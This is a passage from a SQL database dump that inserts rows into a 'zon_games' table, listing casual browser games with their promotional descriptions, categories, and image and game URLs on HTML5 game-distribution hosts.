(162, '3D Golf Adventure', '3D Golf Adventure is a fun and engaging online game designed for players of all ages. This game combines elements of mini-golf with an exciting 3D environment, bringing a fresh twist to the traditional golfing experience.The goal in 3D Golf Adventure is simple: get the golf ball into the hole. Players need to carefully aim and control the power of their shots to navigate through each course. Avoiding Obstacles: Watch out for water hazards and walls scattered around the terrain. These obstacles add a layer of challenge, requiring players to strategize their shots to avoid losing strokes or getting stuck.', 'https://img.gamemonetize.com/lktavtmelnunk2sl1erg9q4hsn85islm/512x384.jpg', 'https://html5.gamemonetize.com/lktavtmelnunk2sl1erg9q4hsn85islm/', '0', 'Sports', 0, 0, '', 0, ''),
(163, 'Basketball Street', 'Select your favourite player among the 3 available and show your free throws skills! You have one minute and 25 shots to get as many balls as possible into the basket! Striped balls are worth 2 points (instead of 1): concentrate on these special balls for extra points!', 'https://img.gamemonetize.com/xvwtddwzkqcwdcahhsrs5btoza8s218i/512x384.jpg', 'https://html5.gamemonetize.com/xvwtddwzkqcwdcahhsrs5btoza8s218i/', '0', 'Sports', 0, 0, '', 0, ''),
(164, 'Head ball championship2', 'my game is based on football and a single 2d game The players head is the main player and the Up arrow and W key jump and Press the left arrow or A key to player move the left side and Right arrow Or D key to player move the Right Side.', 'https://img.gamemonetize.com/m77jn934kb1j9rsltmeeuqvhzt549gc9/512x384.jpg', 'https://html5.gamemonetize.com/m77jn934kb1j9rsltmeeuqvhzt549gc9/', '0', 'Sports', 0, 0, '', 0, ''),
(165, 'Crab Penalty', 'Step into the sandy arena of Crab Penalty, where you take on the challenge of scoring goals with an unlikely yet charming player&amp;mdash; a crab! Set on a picturesque beach, this fun and engaging game combines the thrill of penalty shooting with the unique twist of controlling a crab. Aim carefully and use your skills to outsmart the goalie, ensuring your crab kicks the ball into the net. Crab Penalty offers endless entertainment and a delightful seaside adventure.', 'https://img.gamemonetize.com/yt8kpi3lpnk6r62jpn7cckge4h9us3ux/512x384.jpg', 'https://html5.gamemonetize.com/yt8kpi3lpnk6r62jpn7cckge4h9us3ux/', '0', 'Sports', 0, 0, '', 0, ''),
(166, 'Football Leauge', 'Step into the thrill of the stadium with Football League, a fast-paced, action-packed soccer game where you lead your team to victory! Choose your players, master your tactics, and score incredible goals to climb the ranks and become the champion. With intuitive controls, stunning graphics, and dynamic gameplay, Football League delivers an immersive soccer experience for players of all skill levels.', 'https://img.gamemonetize.com/qahsfosbapnzdo3ya16hjf9uudzw7eob/512x384.jpg', 'https://html5.gamemonetize.com/qahsfosbapnzdo3ya16hjf9uudzw7eob/', '0', 'Sports', 0, 0, '', 0, ''),
(167, 'Ping Pong Table Tennis', 'In Ping Pong: Table Tennis, you&amp;rsquo;ll enter the exciting world of table tennis matches! This game allows you to enjoy the fun of sports! It&amp;rsquo;s a perfect casual game for every Ping Pong enthusiast.The gameplay is simple and easy to play. Control the ping-pong racket, hit the ball accurately,and react quickly! In every game, use skill and tactics. Beat your opponent and fight for every point. Your opponents will get tougher, try to adjust your strategy and find their weaknesses!', 'https://img.gamemonetize.com/92la82a07m5svdcghv5t1ytio7bf4q9j/512x384.jpg', 'https://html5.gamemonetize.com/92la82a07m5svdcghv5t1ytio7bf4q9j/', '0', 'Sports', 0, 0, '', 0, ''),
(168, 'Footy Frenzy', 'Step onto the pitch with Footy Frenzy, the ultimate football gaming experience that brings the excitement of the beautiful game to your fingertips! Dive into fast-paced matches, strategize your plays, and score stunning goals. Whether youre playing solo, competing against friends, or taking on opponents from around the world, Footy Frenzy offers immersive gameplay, realistic graphics, and smooth controls that will keep you on the edge of your seat. Get ready to experience the frenzy of football like never before!', 'https://img.gamemonetize.com/p90xlik2d70zhis3djsoifasq3ytfxjw/512x384.jpg', 'https://html5.gamemonetize.com/p90xlik2d70zhis3djsoifasq3ytfxjw/', '0', 'Sports', 0, 0, '', 0, ''),
(169, 'Grid Drifter', 'Drive the truck through the parking lot with the specified coordinates. Press the arrow keys or the A, D buttons or touch the left and right sides of the phone screen to drive the truck left and right. Avoid if there are other cars.', 'https://img.gamemonetize.com/izcja1nhzk4anp1vzeljy28p66mgvzfp/512x384.jpg', 'https://html5.gamemonetize.com/izcja1nhzk4anp1vzeljy28p66mgvzfp/', '0', 'Sports', 0, 0, '', 0, ''),
(170, 'Math Driving Test', 'Drive and grab the objects to get the requested amount of unit cubes as quickly as possible. You have to get a medal to pass each level. Hitting tree or building or fence 3 times fails the game. Use the arrow keys I WASD or arrow buttons (mobile) to accelarate and steer the car.', 'https://img.gamemonetize.com/souihl4o9tpdd7xadmz778waakj6m29m/512x384.jpg', 'https://html5.gamemonetize.com/souihl4o9tpdd7xadmz778waakj6m29m/', '0', 'Sports', 0, 0, '', 0, ''),
(171, 'Count Masters Superhero', 'In Count Masters: Superhero, begin an interesting parkour adventure like no other! As a superhero,youre constantly running, jumping, and avoiding obstacles throughout the level. Such as avoiding rotating mace, cutting machine and so on.', 'https://img.gamemonetize.com/9prltg366ftrjuuvkyow792209ye37bg/512x384.jpg', 'https://html5.gamemonetize.com/9prltg366ftrjuuvkyow792209ye37bg/', '0', 'Arcade', 0, 0, '', 0, ''),
(172, 'Plinko Ballon Archery Pop', 'Plink Balloon: Archery Pop blends the thrill of archery with the fun of Plinko! Take aim and pop balloons as they float upward, each releasing colored balls with unique effects on your score. Green balloons add points, red ones subtract, and yellow balloons keep you guessing! Balls stay in place until the 75-second round ends, then tumble down the Plinko board to determine your final score. Challenge yourself to maximize points and hone your skills in training mode. Easy to learn but tricky to master, Plink Balloon: Archery Pop is endless fun for players of all ages!', 'https://img.gamemonetize.com/nsuj9l7hotazamfmbvt36c1xneya84pk/512x384.jpg', 'https://html5.gamemonetize.com/nsuj9l7hotazamfmbvt36c1xneya84pk/', '0', 'Arcade', 0, 0, '', 0, ''),
(173, '4color swipe', '4color swipe is simple, yet highly engaging game challenges players to swipe on the screen to send a ball in the correct direction based on its color. As the game progresses, the difficulty ramps up, offering an increasingly challenging experience that keeps you on your toes. The objective is to accurately swipe the ball in the right direction when it reaches the central circle, according to its color. You only get one chance to make the right move, so quick reflexes and sharp focus are key to success!', 'https://img.gamemonetize.com/9vrdlxdyokgp8hwhi7eseyg72k3pa54w/512x384.jpg', 'https://html5.gamemonetize.com/9vrdlxdyokgp8hwhi7eseyg72k3pa54w/', '0', 'Arcade', 0, 0, '', 0, ''),
(174, 'Mad Joker', 'Looking for a new 2d games with interesting and engaging story? Or are you looking for breakneck immersive Fire battles in 2D setting? Or maybe your aim is to find something with the joker role playing? If so, then Mad Joker is best choice for you! Mad Joker: Action Game 2d is a new Comic 2D Adventure indie game, free and Gives the best 2d gaming experience. playing across a significant place heading the city ruled by the power of the cops. Features: Ultra HD Joker Game Unique and fun gameplay Original Levels Weapons and fun shooting experience 2D Adventure and platformer game Enjoy the experience of Mad Joker: Action Game', 'https://img.gamemonetize.com/t6f07c891x0hamvbgdy0lk4baaue7imc/512x384.jpg', 'https://html5.gamemonetize.com/t6f07c891x0hamvbgdy0lk4baaue7imc/', '0', 'Arcade', 0, 0, '', 0, ''),
(175, 'Jump and Fly', 'Join the adventure in Jump and Fly, where youll guide an energetic squirrel and a cheerful bee through a vibrant and whimsical forest! Jump from platform to platform, collect coins, and grab power-ups to boost your abilities in this action-packed game. Embark on a magical journey and help our adorable characters reach new heights. Whether you&amp;rsquo;re a seasoned gamer or new to mobile gaming, Jump and Fly offers endless fun and excitement.', 'https://img.gamemonetize.com/txwl3520lsglou2w07efd3tlymvue57o/512x384.jpg', 'https://html5.gamemonetize.com/txwl3520lsglou2w07efd3tlymvue57o/', '0', 'Arcade', 0, 0, '', 0, ''),
(176, 'Horror Ban Ban 1 2 Player Parkour', 'The terrifying siblings need to escape the haunted house. They must face their fears and collect what they need to get away. Choose one of the two siblings and escape together. Each sibling has specific items to gather, and you&amp;rsquo;ll need to find the red and blue remotes to unlock the door. Be very careful&amp;mdash;there are thorns and sharp knives everywhere in this frightening house. Make sure to reach the door safely!', 'https://img.gamemonetize.com/m9rmolvne3a31grtkcbwj0s6b123aq8v/512x384.jpg', 'https://html5.gamemonetize.com/m9rmolvne3a31grtkcbwj0s6b123aq8v/', '0', 'Arcade', 0, 0, '', 0, ''),
(177, 'Frog Feast', 'Dive into the vibrant world of Hungry Frog, a fast-paced and addictive game where quick reflexes and sharp attention are your best allies. In this lively adventure, you take on the role of a ravenous frog living in a lush, bustling pond teeming with life and energy. Your mission is simple yet challenging: devour as many flying insects as possible to keep your frog happy and healthy. As insects buzz across the screen, your frog must leap with precision to catch them with its sticky tongue. The more insects you catch, the higher your score climbs. But beware! Missing these elusive bugs will cost you a life.', 'https://img.gamemonetize.com/536750dztmchi4cvr7lluh32ckzibqnw/512x384.jpg', 'https://html5.gamemonetize.com/536750dztmchi4cvr7lluh32ckzibqnw/', '0', 'Arcade', 0, 0, '', 0, ''),
(178, 'City Banana Man Agent', 'Begin an interesting fighting experience in City Banana Man Agent! Youll play as a strange banana agent passing busy city streets. Choose a spot to land and start exploring this wonderful city. Find the target and complete the task. And show your driving skills. Equipped with many powerful weapons and shoot enemies. Aim your gun at the enemy and attack him.', 'https://img.gamemonetize.com/hc9izf5pjm906xbakcp4gxv5joe2frtk/512x384.jpg', 'https://html5.gamemonetize.com/hc9izf5pjm906xbakcp4gxv5joe2frtk/', '0', 'Arcade', 0, 0, '', 0, ''),
(179, 'Rolling Ball Halloween Escape', 'Want to have a terrifying adventure in Rolling Ball Halloween scape? This exciting game invites you to roll through a scary world. Here is full of many vivid Halloween decorations! Roll your ball through the eerie sky, avoid obstacles, and escape the haunted landscape! Control your ball,speeding it up or backing it through many obstacles.Pay attention to avoiding swinging pendulums,shattering boxes and so on.', 'https://img.gamemonetize.com/govh3xheo7xcct4h7lkbiu5ka4ts1b3h/512x384.jpg', 'https://html5.gamemonetize.com/govh3xheo7xcct4h7lkbiu5ka4ts1b3h/', '0', 'Arcade', 0, 0, '', 0, ''),
(180, 'MineBlocks Building', 'MineBlocks: Building is an immersive sandbox game where creativity knows no bounds! Dive into a pixelated world to craft, build, and explore unique landscapes. Gather resources, design intricate structures, and unleash your imagination as you construct anything from cozy homes to sprawling cities. With intuitive controls and vibrant graphics, players of all ages can enjoy endless possibilities. Web Dev &lt;a href=\'https://www.coolcrazygames.com/\'&gt;https://www.coolcrazygames.com/&lt;/a&gt;', 'https://img.gamemonetize.com/yg8x6cybrnh21hdn4witgojvykbge7nw/512x384.jpg', 'https://html5.gamemonetize.com/yg8x6cybrnh21hdn4witgojvykbge7nw/', '0', 'Arcade', 0, 0, '', 0, ''),
(181, 'Obby Skate Forever Parkour', 'In this adventure, youre skating through a very dangerous course, and you must, under no circumstances, fall off. Obby is mastering the art of skateboarding and is navigating through extremely perilous areas. He&amp;rsquo;s skating on top of building rooftops or construction blocks, and sometimes performing very risky moves. The only thing he needs to do is collect all the coins and reach the finish line at the end of the level.', 'https://img.gamemonetize.com/17zhjad19qrb0ao3mj1dkzlusgq94i5m/512x384.jpg', 'https://html5.gamemonetize.com/17zhjad19qrb0ao3mj1dkzlusgq94i5m/', '0', 'Arcade', 0, 0, '', 0, ''),
(182, 'SquidGame3D', 'Engaging Puzzles: Each level offers a unique challenge, whether it&amp;rsquo;s rhythm-based action, strategic battles, or construction puzzles. Diverse Gameplay: No two levels are the same, keeping players engaged and on their toes. Skill Progression: As you advance, levels become more complex, requiring a blend of quick thinking, strategy, and precise execution.', 'https://img.gamemonetize.com/z5aqdklwpdk31xx7d3mwp2wxgnn67l4f/512x384.jpg', 'https://html5.gamemonetize.com/z5aqdklwpdk31xx7d3mwp2wxgnn67l4f/', '0', 'Adventure', 0, 0, '', 0, ''),
(183, 'Staircase To Heaven', 'Embark on an exhilarating journey from ground zero to the skies in Only Up! However, theres a twist &amp;ndash; no checkpoints exist on this ascent. Stumble, and you must swiftly catch yourself to avoid losing precious progress. Will you conquer the summit, or succumb to the challenge and give up?', 'https://img.gamemonetize.com/wjtcbugg741umdfdwwrgzx684ydwettp/512x384.jpg', 'https://html5.gamemonetize.com/wjtcbugg741umdfdwwrgzx684ydwettp/', '0', 'Adventure', 0, 0, '', 0, ''),
(184, 'Cool Man Adventure', 'Hi there! It sounds like youre interested in playing Cool Man Adventure, To play, youll need to jump &amp;amp; run on platforms, avoid obstacles and fire gas , robo, gear ring , and defeat enemies. Dont forget to collect key along the way! The game has 10 levels for you to explore, so theres plenty of adventure to be had.', 'https://img.gamemonetize.com/l97eqobidhids1gdhpa2tnc2qr49azof/512x384.jpg', 'https://html5.gamemonetize.com/l97eqobidhids1gdhpa2tnc2qr49azof/', '0', 'Adventure', 0, 0, '', 0, ''),
(185, 'Savage Jon  ', 'Savage Jon is an action-adventure platform game, where Jon looks for adventure and flight monsters, and uses Jet Pack to survive the deadly forest and return home. The mission is to guide Jon through ten levels, collecting trophies in the hideout of his enemy. Are you ready for the action-packed adventure?', 'https://img.gamemonetize.com/30ck5xaezqv5vuzftf3g1oo4rtk9o9hf/512x384.jpg', 'https://html5.gamemonetize.com/30ck5xaezqv5vuzftf3g1oo4rtk9o9hf/', '0', 'Adventure', 0, 0, '', 0, ''),
(186, 'Halloween Tic Tac Toe', 'Halloween Tic Tac Toe brings a spooky twist to the classic game! Play against a friend or the computer, using ghosts, pumpkins, and other Halloween-themed icons as your Xs and Os. Enjoy the eerie fun and test your strategic skills in this ghoulish version of Tic Tac Toe. Perfect for some quick and spooky entertainment!', 'https://img.gamemonetize.com/bkzm2igk4gc4eyhfy7jst84vjmbnrhwr/512x384.jpg', 'https://html5.gamemonetize.com/bkzm2igk4gc4eyhfy7jst84vjmbnrhwr/', '0', 'Adventure', 0, 0, '', 0, ''),
(187, 'Steve SurvivalCraft Easy', 'In this adventure, Steve mounts his horse and wants to go to the villagers. The villagers are waiting for him to show him the chest they found. Steve must collect all the gold, defeat all the monsters in the forest, and reach the chest. When he opens the chest, he will become the king of the entire world. The chest contains a very valuable item. Steve must be very careful, as the forest is filled with monsters and obstacles.', 'https://img.gamemonetize.com/5tuf1dnz1lq475pw7jyq3s70jq11u8u2/512x384.jpg', 'https://html5.gamemonetize.com/5tuf1dnz1lq475pw7jyq3s70jq11u8u2/', '0', 'Adventure', 0, 0, '', 0, ''),
(188, 'The Wizard Elion  Halloween Edition ', 'Although you may have lived this little adventure, you will live it again but in a different climate! Take the wizard Elion back home ------------------- Updates to some arts and optimization of scenarios. available languages: English Portuguese Italian', 'https://img.gamemonetize.com/se6clex6m0cn5hqdj7j0rvz8ykt91mb5/512x384.jpg', 'https://html5.gamemonetize.com/se6clex6m0cn5hqdj7j0rvz8ykt91mb5/', '0', 'Adventure', 0, 0, '', 0, ''),
(189, 'SpaceShip Fight', 'Space Ship by gamed Fight is an action-packed mobile game that thrusts you into intense space battles. As the pilot of a powerful spacecraft,', 'https://img.gamemonetize.com/dt74ld31xepn9c89z6wa2pi7jkxt4lb8/512x384.jpg', 'https://html5.gamemonetize.com/dt74ld31xepn9c89z6wa2pi7jkxt4lb8/', '0', 'Adventure', 0, 0, '', 0, ''),
(190, 'Escape Mystic Castle Mobile version ', 'A villager was taken to a castle and was trapped there, now try to get out of there if you can! Of course you will have to look for a way out so look carefully and use the items wisely! Its a short adventure, but I think youll like it... #metroidvania #studiosagbr', 'https://img.gamemonetize.com/dpei1y1bfdd6vsgthkjwfnk7u7g0xu4s/512x384.jpg', 'https://html5.gamemonetize.com/dpei1y1bfdd6vsgthkjwfnk7u7g0xu4s/', '0', 'Adventure', 0, 0, '', 0, '');
INSERT INTO `zon_games` (`id`, `game_name`, `game_description`, `game_image_url`, `game_url`, `game_published`, `game_category`, `game_status`, `game_played`, `game_banner_url`, `is_featured`, `game_card_size`) VALUES
(191, 'The wizard Elion', 'When the old wizard Elion tried to conjure a sphere of light, a mistake transported him to a modern shopping mall full of monsters. Now, lost among shop windows and strange creatures, Elion needs to find a way to correct his spell and return to his kingdom, before the chaos spreads further and the monsters are completely released. ---------The game has 3 languages: Portuguese, English and Italian ---------You can play on your mobile device too. Good fun!', 'https://img.gamemonetize.com/473hhqxielr67bfqa3w8e2isxy76yeyv/512x384.jpg', 'https://html5.gamemonetize.com/473hhqxielr67bfqa3w8e2isxy76yeyv/', '0', 'Adventure', 0, 0, '', 0, ''),
(192, 'Major Sparkle', 'Shoot the historic monster with a fighter plane Explore the world of the historic war between monsters. Players need to destroy all of them and score as high as possible. During fighting don&amp;rsquo;t forget to collect ammos, bombs, and rewards. Be careful! Avoid collision with the monsters or structure either the game will be over. If you like genres such as adventure, action, quests or just want to have a good time then this game is for you. Features of this game: High Quality graphics Game size is minimal Super simple controls Interesting quests', 'https://img.gamemonetize.com/vzzbqleb1wwkm5gflrxzkq32sfi7v5ou/512x384.jpg', 'https://html5.gamemonetize.com/vzzbqleb1wwkm5gflrxzkq32sfi7v5ou/', '0', 'Adventure', 0, 0, '', 0, ''),
(193, 'Impossible Truck Stunt Parking', 'Are you like driving games? If yes then you will love to play the latest and unique truck driving and impossible parking game. Learn how to drive and park the huge vehicle on the impossible tracks. Steer your truck on the treacherous tracks fast and park it on the right parking spot. Use WASD or Arrows to drive, Space - handbrake.', 'https://img.gamedistribution.com/c524263cde44468a8b851e9ca7147dce-512x384.jpeg', 'https://html5.gamedistribution.com/c524263cde44468a8b851e9ca7147dce/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(194, 'Summer Match3', 'Your buddies are here and do not expect from them anything less than long hours of fun and entertainment.Summer Match3 is fun addictive match3 game.Match 3 or more candies to play the game.', 'https://img.gamedistribution.com/967965ce274345f7b05ce5989181628e-512x384.jpeg', 'https://html5.gamedistribution.com/967965ce274345f7b05ce5989181628e/', '0', 'Match-3', 0, 0, '', 0, ''),
(195, 'Snow Plow Jeep Simulator 3D', 'When winter comes the yard is constantly snowing, which sleeps the whole area. Because of this, the roads come to a dangerous state and quite often various accidents occur on them. Today in the game Snow Plow Jeep Driving you will work with the municipal service of a small town located in a mountainous area. Your duties include cleaning the roads from snow.', 'https://img.gamedistribution.com/87d3f614e6e446449b9b2649fa2a5e08-512x384.jpeg', 'https://html5.gamedistribution.com/87d3f614e6e446449b9b2649fa2a5e08/', '0', 'Simulation', 0, 0, '', 0, ''),
(196, 'RS7 Sportback Puzzle', 'Play with 6 images in this perfect jigsaw puzzle game: RS7 Sportback Puzzle. All images is with the RS7 Sportback. Solve all puzzles and keep your brain sharp. You have four modes for each picture, 16 pieces, 36 pieces, 64 pieces and 100 pieces. Enjoy and have fun.', 'https://img.gamedistribution.com/05fada44633b44ed8eca7a11c72b9381-512x384.jpeg', 'https://html5.gamedistribution.com/05fada44633b44ed8eca7a11c72b9381/', '0', 'Puzzle', 0, 0, '', 0, ''),
(197, 'Pepperoni Gone Wild', 'Mamma Mia! Your latest pizza creation turned into a GIANT pizza.\n\nWhat\'s worse, it\'s rolling downhill.\n\nEscape from the giant Pepperoni pizza before it crushes you!\n\nCollect coins and perform cool acrobatic skills such as backflips and frontflips (because you can). Use the coins to unlock cool skills and new skins.\n\nFeatures:\n- Funny and relaxing pizza theme by the Italian countryside\n- Unlock more skins such as motorcycles, a funny car, a rolling lasagna and more pizza mayhem.', 'https://img.gamedistribution.com/cd2c102ceabc464cb1efe3653f31bbd6-1280x550.jpeg', 'https://html5.gamedistribution.com/cd2c102ceabc464cb1efe3653f31bbd6/', '0', 'Adventure', 0, 0, 'https://img.gamedistribution.com/cd2c102ceabc464cb1efe3653f31bbd6-512x384.jpeg', 0, ''),
(198, 'Paint the Rings', 'Paint the Rings features:\n- Addictive one-touch gameplay\n- Endless levels', 'https://img.gamedistribution.com/335615d3407f419bb0d9166ae0e3214e-1280x550.jpeg', 'https://html5.gamedistribution.com/335615d3407f419bb0d9166ae0e3214e/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/335615d3407f419bb0d9166ae0e3214e-512x384.jpeg', 0, ''),
(199, 'Block Collapse Challenge', 'Collapse the blocks by clicking groups of horizontally or vertically connected same-color blocks. On each collapse you will obtain a score. The bigger the group you collapse, the higher a score you will get. The status at the bottom will show you the projected score for any selected group. You can apply logic to create bigger groups. Your progress will be saved. So feel free to play it again and again to obtain a higher score. Don\'t let the board fill from blocks to keep game going.', 'https://img.gamedistribution.com/cee0474234ce4ddc8b4d1ee6cd93259b-512x384.jpeg', 'https://html5.gamedistribution.com/cee0474234ce4ddc8b4d1ee6cd93259b/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/cee0474234ce4ddc8b4d1ee6cd93259b-1280x550.jpeg', 0, ''),
(200, 'ToysRace', 'jump ramp, drive faster, you are winner', 'https://img.gamedistribution.com/9c22c3168baf41348f2a916313bc5abf-512x384.jpeg', 'https://html5.gamedistribution.com/9c22c3168baf41348f2a916313bc5abf/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/9c22c3168baf41348f2a916313bc5abf-1280x550.jpeg', 0, ''),
(201, 'Hangman', 'The classic Hangman game is released. Learn new words while improving your guessing skills.\n\nHow high can you score? Earn points and diamonds for each word guessed correctly.\n\nPrevent the stick man from being hanged.\n\nFeatures:\n\n- Find the words too hard to guess? Use diamonds in exchange for hints.\n- Challenging puzzles to beat. Hang with the best.\n- Linear progression of difficulty.', 'https://img.gamedistribution.com/85f63767afa14d30be9938b7e68b974c-1280x550.jpeg', 'https://html5.gamedistribution.com/85f63767afa14d30be9938b7e68b974c/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/85f63767afa14d30be9938b7e68b974c-512x384.jpeg', 0, ''),
(298, 'Snow Drifting 3D Champ 2024', 'Snow Drifting 3D Champ 2024 invites you to conquer a captivating snowy landscape in this thrilling browser-based driving game. Take the wheel of a sleek modern Japanese sports car and master exhilarating drifting mechanics as you explore hilly terrains and the asphalt track. Find the garage and customize your ride by changing its vibrant paint. With multiple camera angles to choose from, immerse yourself in the stunning 3D visuals and unleash your inner drift champion.', 'https://img.gamemonetize.com/min7zahcevrdpz7dou7ag9db2uhh7sku/512x384.jpg', 'https://html5.gamemonetize.com/min7zahcevrdpz7dou7ag9db2uhh7sku/', '0', 'Racing', 0, 0, '', 0, ''),
(299, 'Layer Man 3d Run Collect', 'Ready for an exciting running adventure in Layer Man 3D: Run Collect! Here, you will play as a collection expert. Run around various obstacle courses, collect items, and improve yourself! All you have to do is collect as many coil springs as possible on the track. The more layers you collect, the larger the coil will become.', 'https://img.gamemonetize.com/xhcyeuuown2tyz55w6ookuyf4hqszk9j/512x384.jpg', 'https://html5.gamemonetize.com/xhcyeuuown2tyz55w6ookuyf4hqszk9j/', '0', 'Racing', 0, 0, '', 0, ''),
(300, 'Army Truck Simulator 2024', 'Take control of a cargo army truck in a military game and deliver high-ranking soldiers to their camp. Carrying out your assignment as an army truck driver cargo in this military game is no easy feat, especially when youre an officer. The highways are filled with hazards and obstacles. Nonetheless, as a fearless soldier and expert driver, you must carry out your responsibilities and drive the army truck games fearlessly to transport your ammo and troops to an alternate military station. Web Dev &lt;a href=\'https://kiz10.com//\'&gt;https://kiz10.com//&lt;/a&gt;', 'https://img.gamemonetize.com/3p0c5gp13e1cmlw7dew2pvjulv2akyxu/512x384.jpg', 'https://html5.gamemonetize.com/3p0c5gp13e1cmlw7dew2pvjulv2akyxu/', '0', 'Racing', 0, 0, '', 0, ''),
(301, 'Crash Em Zombies', 'Welcome to Crash Em Zombies Game! Tap or click to change the car direction and start crashing zombies along the way. Avoid obstacles and collect boosters to reach the highest score. Good luck!', 'https://img.gamemonetize.com/ny4cfrf39v7lm3xk6yata4uyu9nxho6g/512x384.jpg', 'https://html5.gamemonetize.com/ny4cfrf39v7lm3xk6yata4uyu9nxho6g/', '0', 'Racing', 0, 0, '', 0, ''),
(302, 'Roblox Climb Motorbike', 'In the adventure game Roblox Climb Motorbike, players may spend a lot of time racing on insane roads, acquiring interesting skins, improving Obbys bike, and completing difficult parkour courses. For fans of fast-paced, skill-based games, this is a must-play because of the thrilling combination of racing, platforming, and character advancement. In this adrenaline-pumping game, youll have to crank your engines, level up your character, and complete parkour tasks. Play this fun obstacle course game on your bike and try to complete each level. Make sure you dont contact the hazardous obstacles in each level before the timer runs out; doing so', 'https://img.gamemonetize.com/y1u8kfpu0lymi72uz9s4nqzs9oztmcot/512x384.jpg', 'https://html5.gamemonetize.com/y1u8kfpu0lymi72uz9s4nqzs9oztmcot/', '0', 'Racing', 0, 0, '', 0, ''),
(303, 'Color Parking Drifter', 'Drive your car drifting the requested colored parking spaces with precision. Dont get the wrong color or go out of the arena. Also be careful of other car passing by.', 'https://img.gamemonetize.com/kwu9zzh8awehnmc5uio2uugm0n7vffpu/512x384.jpg', 'https://html5.gamemonetize.com/kwu9zzh8awehnmc5uio2uugm0n7vffpu/', '0', 'Racing', 0, 0, '', 0, ''),
(304, 'Crazy Cone Sweeper', 'There are 50 cones around the car. Sweep all the cones by hitting them until they are out of the area. But be careful not to let your car go out of the area. Use the z | x or keys to steer the car.', 'https://img.gamemonetize.com/1jm49eajmfccyczdekpdj1qpfzmrt1fn/512x384.jpg', 'https://html5.gamemonetize.com/1jm49eajmfccyczdekpdj1qpfzmrt1fn/', '0', 'Racing', 0, 0, '', 0, ''),
(305, 'Halloween Run Cat Evolution', 'Want to dive into the festive fun of Halloween Run Cat Evolution? In this challenging parkour game, you&amp;rsquo;ll be a cute cat. Keep running and jumping through the spooky Halloween night while avoiding obstacles to achieve the highest high score!', 'https://img.gamemonetize.com/lvwa0lm5eaaldyhz43m0rma5oic4ucw6/512x384.jpg', 'https://html5.gamemonetize.com/lvwa0lm5eaaldyhz43m0rma5oic4ucw6/', '0', 'Racing', 0, 0, '', 0, ''),
(306, 'Halloween Merge Mania', 'Halloween is the season for thrills, chills, and tons of fun games! If youre a fan of puzzle games with a spooky twist, Halloween Merge Mania is the perfect treat for you. Inspired by the popular gameplay style of Suikagame, this addictive game lets you merge creepy Halloween characters to unlock higher-level creatures. Start by combining classic pumpkins and bats, then work your way up to merging iconic monsters like Frankenstein and Jack Skellington. With each new merge, you&amp;rsquo;ll uncover a world packed with eerie fun and excitement. Get ready for a hauntingly good time in Halloween Merge Mania!', 'https://img.gamemonetize.com/snp8lwxavb0cshj020ua2u60oonbty2q/512x384.jpg', 'https://html5.gamemonetize.com/snp8lwxavb0cshj020ua2u60oonbty2q/', '0', 'Racing', 0, 0, '', 0, ''),
(307, 'Spider Evolution Runner', 'Spider Evolution Runner is a casual 3D running game in which you will become an evolving spider and embark on an exciting adventure! Running on the track, avoid obstacles and collect energy. Evolve into a more powerful spider form.', 'https://img.gamemonetize.com/m9borgv0blojredyfc0ui6m5wk193nra/512x384.jpg', 'https://html5.gamemonetize.com/m9borgv0blojredyfc0ui6m5wk193nra/', '0', 'Racing', 0, 0, '', 0, ''),
(308, 'Sawblade Fest Run', 'Like cutting things into many pieces? Challenge your reflexes in Sawblade Fest Run! In this intense arcade game, your goal is very simple. Keep running, avoiding deadly obstacles like iron sheets, walls, and other giant fruit monsters!', 'https://img.gamemonetize.com/jwrsy3u3pe26a9duc6houu4ouc0bsad5/512x384.jpg', 'https://html5.gamemonetize.com/jwrsy3u3pe26a9duc6houu4ouc0bsad5/', '0', 'Racing', 0, 0, '', 0, ''),
(309, 'The Crazy Dentist wojak game', 'Join Dr. Wojak, the friendly and knowledgeable dentist, in an exciting 2D adventure crafted especially for kids! In Dental Adventure with Dr. Wojak, young players will dive into a colorful world where learning about dental hygiene is both fun and engaging. Features: Engaging Gameplay: Assist Dr. Wojak in various mini-games that involve cleaning, brushing, and caring for patients teeth. Educational Content: Discover the importance of brushing, flossing, and regular dental check-ups through interactive lessons. Colorful Graphics: Delight in vibrant and whimsical graphics that make dental care an enjoyable experience. Customizable Characters:', 'https://img.gamemonetize.com/y8iedym7u25m04ns5xdabpzxnp1pyr7h/512x384.jpg', 'https://html5.gamemonetize.com/y8iedym7u25m04ns5xdabpzxnp1pyr7h/', '0', 'Cooking', 0, 0, '', 0, ''),
(310, 'Baby Taylor Back To School', 'Baby Taylor Back To School is an educational game. The long vacation is coming to an end. TodayTaylor is going to pack her school things. Lets help Taylor pack her things! Taylor is still asleep, wake her up quickly, and help her brush her teeth and wash her face. The most important thing for school is the school bag. Help her organize the books and pencils she needs to bring to school and put them in her school bag. And the most important thing is the school uniform, dont forget it. Finally, help Taylor review the knowledge she has learned so that her knowledge will be more solid.', 'https://img.gamemonetize.com/ma46cka3c27lucz8bzfp99samggqeo9p/512x384.jpg', 'https://html5.gamemonetize.com/ma46cka3c27lucz8bzfp99samggqeo9p/', '0', 'Cooking', 0, 0, '', 0, ''),
(311, 'World of Alice   Vegetables Names', 'World of Alice - Vegetables Names is an educational game developed for children where they will learn the names of vegetables in a fun and interactive way from their cell phone, tablet or computer. Excellent educational resource. In World of Alice, learning is fun.', 'https://img.gamemonetize.com/590dmy86oek5nuvhljntj3hj9yytst25/512x384.jpg', 'https://html5.gamemonetize.com/590dmy86oek5nuvhljntj3hj9yytst25/', '0', 'Cooking', 0, 0, '', 0, ''),
(312, 'Big Donuts Mania', 'If youve made a match, the donuts will be clear, and you will get the points! The more you get, the better you will rank in the high score. Warning: Big Donuts Mania is as addictive as a box of donuts!', 'https://img.gamemonetize.com/vzk4zr4ad5elwwx1d5c9vm0b4osmotb4/512x384.jpg', 'https://html5.gamemonetize.com/vzk4zr4ad5elwwx1d5c9vm0b4osmotb4/', '0', 'Cooking', 0, 0, '', 0, ''),
